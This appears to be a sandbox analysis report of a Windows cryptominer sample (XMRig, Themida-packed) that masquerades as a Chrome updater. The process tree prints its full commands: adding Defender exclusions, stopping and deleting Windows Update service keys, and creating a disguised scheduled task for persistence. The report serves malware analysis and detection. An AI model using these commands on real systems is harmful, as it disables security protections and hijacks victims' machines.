Analysis
-
max time kernel
300s -
max time network
296s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
25-09-2022 11:52
Behavioral task
behavioral1
Sample
11.exe
Resource
win7-20220812-en
General
-
Target
11.exe
-
Size
7.0MB
-
MD5
b76c48fd62b955eea124b76e3e1eddf0
-
SHA1
40ac78ddd36295c7abf81e9e1405f2e75953ab17
-
SHA256
2a52bd1672e345f12e0175bcaec0f9c520c8523d74e576c222a89b7b258f64f2
-
SHA512
9e5b59f61a2a1812923110cedd3fe85c9f0e8332450f89a625b525786d0705e8e5f90067c38f8ed73ef1eb446871dbeda8906edba8cb0e4d1893577cf6a85209
-
SSDEEP
196608:Zff6pVbPXSxEieA3Rry41AjbZLKjewctp28CWcDdod0Xi6P:VypUxRrP1KIePp2jWcy0XiE
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
11.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2044-166-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2044-168-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
11.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts 11.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1532 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/2044-166-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2044-168-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
updater.exe11.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 292 taskeng.exe -
Processes:
resource yara_rule behavioral1/memory/1604-54-0x000000013F650000-0x00000001402FB000-memory.dmp themida behavioral1/memory/1604-55-0x000000013F650000-0x00000001402FB000-memory.dmp themida behavioral1/memory/1604-56-0x000000013F650000-0x00000001402FB000-memory.dmp themida behavioral1/memory/1604-57-0x000000013F650000-0x00000001402FB000-memory.dmp themida behavioral1/memory/1604-58-0x000000013F650000-0x00000001402FB000-memory.dmp themida behavioral1/memory/1604-59-0x000000013F650000-0x00000001402FB000-memory.dmp themida behavioral1/memory/1604-60-0x000000013F650000-0x00000001402FB000-memory.dmp themida behavioral1/memory/1604-80-0x000000013F650000-0x00000001402FB000-memory.dmp themida behavioral1/memory/1604-100-0x000000013F650000-0x00000001402FB000-memory.dmp themida \Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/1532-114-0x000000013F9E0000-0x000000014068B000-memory.dmp themida behavioral1/memory/1532-115-0x000000013F9E0000-0x000000014068B000-memory.dmp themida behavioral1/memory/1532-118-0x000000013F9E0000-0x000000014068B000-memory.dmp themida behavioral1/memory/1532-116-0x000000013F9E0000-0x000000014068B000-memory.dmp themida behavioral1/memory/1532-119-0x000000013F9E0000-0x000000014068B000-memory.dmp themida behavioral1/memory/1532-120-0x000000013F9E0000-0x000000014068B000-memory.dmp themida behavioral1/memory/1532-153-0x000000013F9E0000-0x000000014068B000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/1532-164-0x000000013F9E0000-0x000000014068B000-memory.dmp themida -
Processes:
11.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 11.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
11.exeupdater.exepid process 1604 11.exe 1532 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 1532 set thread context of 2012 1532 updater.exe conhost.exe PID 1532 set thread context of 2044 1532 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.exe11.exeupdater.execmd.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe 11.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 572 sc.exe 1396 sc.exe 584 sc.exe 320 sc.exe 332 sc.exe 1320 sc.exe 1164 sc.exe 1804 sc.exe 1952 sc.exe 1092 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0d31739e6d0d801 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 1260 powershell.exe 1316 powershell.exe 1796 powershell.exe 2040 powershell.exe 1104 powershell.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe 2044 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 1260 powershell.exe Token: SeShutdownPrivilege 364 powercfg.exe Token: SeDebugPrivilege 1316 powershell.exe Token: SeShutdownPrivilege 572 powercfg.exe Token: SeShutdownPrivilege 1140 powercfg.exe Token: SeShutdownPrivilege 1380 powercfg.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeShutdownPrivilege 1108 powercfg.exe Token: SeDebugPrivilege 1104 powershell.exe Token: SeShutdownPrivilege 1760 powercfg.exe Token: SeShutdownPrivilege 908 powercfg.exe Token: SeShutdownPrivilege 1148 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1612 WMIC.exe Token: SeIncreaseQuotaPrivilege 1612 WMIC.exe Token: SeSecurityPrivilege 1612 WMIC.exe Token: SeTakeOwnershipPrivilege 1612 WMIC.exe Token: SeLoadDriverPrivilege 1612 WMIC.exe Token: SeSystemtimePrivilege 1612 WMIC.exe Token: SeBackupPrivilege 1612 WMIC.exe Token: SeRestorePrivilege 1612 WMIC.exe Token: SeShutdownPrivilege 1612 WMIC.exe Token: SeSystemEnvironmentPrivilege 1612 WMIC.exe Token: SeUndockPrivilege 1612 WMIC.exe Token: SeManageVolumePrivilege 1612 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1612 WMIC.exe Token: SeIncreaseQuotaPrivilege 1612 WMIC.exe Token: SeSecurityPrivilege 1612 WMIC.exe Token: SeTakeOwnershipPrivilege 1612 WMIC.exe Token: SeLoadDriverPrivilege 1612 WMIC.exe Token: SeSystemtimePrivilege 1612 WMIC.exe Token: SeBackupPrivilege 1612 WMIC.exe Token: SeRestorePrivilege 1612 WMIC.exe Token: SeShutdownPrivilege 1612 WMIC.exe Token: SeSystemEnvironmentPrivilege 1612 WMIC.exe Token: SeUndockPrivilege 1612 WMIC.exe Token: SeManageVolumePrivilege 1612 WMIC.exe Token: SeLockMemoryPrivilege 2044 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
11.execmd.execmd.exepowershell.exepowershell.exetaskeng.exedescription pid process target process PID 1604 wrote to memory of 1260 1604 11.exe powershell.exe PID 1604 wrote to memory of 1260 1604 11.exe powershell.exe PID 1604 wrote to memory of 1260 1604 11.exe powershell.exe PID 1604 wrote to memory of 996 1604 11.exe cmd.exe PID 1604 wrote to memory of 996 1604 11.exe cmd.exe PID 1604 wrote to memory of 996 1604 11.exe cmd.exe PID 1604 wrote to memory of 1252 1604 11.exe cmd.exe PID 1604 wrote to memory of 1252 1604 11.exe cmd.exe PID 1604 wrote to memory of 1252 1604 11.exe cmd.exe PID 1604 wrote to memory of 1316 1604 11.exe powershell.exe PID 1604 wrote to memory of 1316 1604 11.exe powershell.exe PID 1604 wrote to memory of 1316 1604 11.exe powershell.exe PID 996 wrote to memory of 1164 996 cmd.exe sc.exe PID 996 wrote to memory of 1164 996 cmd.exe sc.exe PID 996 wrote to memory of 1164 996 cmd.exe sc.exe PID 1252 wrote to memory of 364 1252 cmd.exe powercfg.exe PID 1252 wrote to memory of 364 1252 cmd.exe powercfg.exe PID 1252 wrote to memory of 364 1252 cmd.exe powercfg.exe PID 996 wrote to memory of 1804 996 cmd.exe sc.exe PID 996 wrote to memory of 1804 996 cmd.exe sc.exe PID 996 wrote to memory of 1804 996 cmd.exe sc.exe PID 996 wrote to memory of 1952 996 cmd.exe sc.exe PID 996 wrote to memory of 1952 996 cmd.exe sc.exe PID 996 wrote to memory of 1952 996 cmd.exe sc.exe PID 996 wrote to memory of 1092 996 cmd.exe sc.exe PID 996 wrote to memory of 1092 996 cmd.exe sc.exe PID 996 wrote to memory of 1092 996 cmd.exe sc.exe PID 1252 wrote to memory of 572 1252 cmd.exe powercfg.exe PID 1252 wrote to memory of 572 1252 cmd.exe powercfg.exe PID 1252 wrote to memory of 572 1252 cmd.exe powercfg.exe PID 996 wrote to memory of 584 996 cmd.exe sc.exe PID 996 wrote to memory of 584 996 cmd.exe sc.exe PID 996 wrote to memory of 584 996 cmd.exe sc.exe PID 996 wrote to memory of 1520 996 cmd.exe reg.exe PID 996 wrote to memory of 1520 996 cmd.exe reg.exe PID 996 wrote to memory of 1520 996 cmd.exe reg.exe PID 1252 wrote to memory of 1140 1252 cmd.exe powercfg.exe PID 1252 wrote to memory of 1140 1252 cmd.exe powercfg.exe PID 1252 wrote to memory of 1140 1252 cmd.exe powercfg.exe PID 996 wrote to memory of 1480 996 cmd.exe reg.exe PID 996 wrote to memory of 1480 996 cmd.exe reg.exe PID 996 wrote to memory of 1480 996 cmd.exe reg.exe PID 996 wrote to memory of 1824 996 cmd.exe reg.exe PID 996 wrote to memory of 1824 996 cmd.exe reg.exe PID 996 wrote to memory of 1824 996 cmd.exe reg.exe PID 996 wrote to memory of 1428 996 cmd.exe reg.exe PID 996 wrote to memory of 1428 996 cmd.exe reg.exe PID 996 wrote to memory of 1428 996 cmd.exe reg.exe PID 1252 wrote to memory of 1380 1252 cmd.exe powercfg.exe PID 1252 wrote to memory of 1380 1252 cmd.exe powercfg.exe PID 1252 wrote to memory of 1380 1252 cmd.exe powercfg.exe PID 996 wrote to memory of 1972 996 cmd.exe reg.exe PID 996 wrote to memory of 1972 996 cmd.exe reg.exe PID 996 wrote to memory of 1972 996 cmd.exe reg.exe PID 1316 wrote to memory of 276 1316 powershell.exe schtasks.exe PID 1316 wrote to memory of 276 1316 powershell.exe schtasks.exe PID 1316 wrote to memory of 276 1316 powershell.exe schtasks.exe PID 1604 wrote to memory of 1796 1604 11.exe powershell.exe PID 1604 wrote to memory of 1796 1604 11.exe powershell.exe PID 1604 wrote to memory of 1796 1604 11.exe powershell.exe PID 1796 wrote to memory of 1620 1796 powershell.exe schtasks.exe PID 1796 wrote to memory of 1620 1796 powershell.exe schtasks.exe PID 1796 wrote to memory of 1620 1796 powershell.exe schtasks.exe PID 292 wrote to memory of 1532 292 taskeng.exe updater.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#khtnr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {67A561F8-0A9F-4B32-BA57-A4D704C276B6} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe lhmcarocyjvzk3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe jftlneyiewlaxjvq GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mVBd6IrnBFdAaSbxamnHt0v75gn2+2heHSc2pqg9laV3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD50b1c9cde6b467847472545263c58791c
SHA13acaf0cefda3ab7e43c18a8eb17ec69477cc36a8
SHA256394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14
SHA512276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD50b1c9cde6b467847472545263c58791c
SHA13acaf0cefda3ab7e43c18a8eb17ec69477cc36a8
SHA256394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14
SHA512276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02
-
C:\Program Files\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD50a07e4be67bec11b525795ea15cd0e80
SHA1e62e2c165f3466e487babbfa9e2a16b583e9a84a
SHA25665462903c650e37ba468b4b9d260f58b4b93c0fd98b3c525df22a58a96943af1
SHA512aad1aabbe8586f20435e8dac3768fa42652ed6583267b2f04f5c786345b9c069bcb3d4060cabb08f9318141dd427acec00d91fef329479cf64be6644638e3690
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD50a07e4be67bec11b525795ea15cd0e80
SHA1e62e2c165f3466e487babbfa9e2a16b583e9a84a
SHA25665462903c650e37ba468b4b9d260f58b4b93c0fd98b3c525df22a58a96943af1
SHA512aad1aabbe8586f20435e8dac3768fa42652ed6583267b2f04f5c786345b9c069bcb3d4060cabb08f9318141dd427acec00d91fef329479cf64be6644638e3690
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD54414f1125d1d6f86a7588f226996a8e6
SHA11bb04893c1e093f8ab7880144bf2d720bd56ca03
SHA2563187ae368d15b7a1cfbb7b2c1338464ab40586b9432b6b4d259c67e0e9fe9d7e
SHA51201f6158e1f562f63b0e5f17dfe8cd8ad8e8db8c41bca94dbb0dc551c68ba923aa5708c0c7f8ce39c287aaa5dd713ec74f347c10d9dec8eaab9ecd170fd6b9c80
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD50b1c9cde6b467847472545263c58791c
SHA13acaf0cefda3ab7e43c18a8eb17ec69477cc36a8
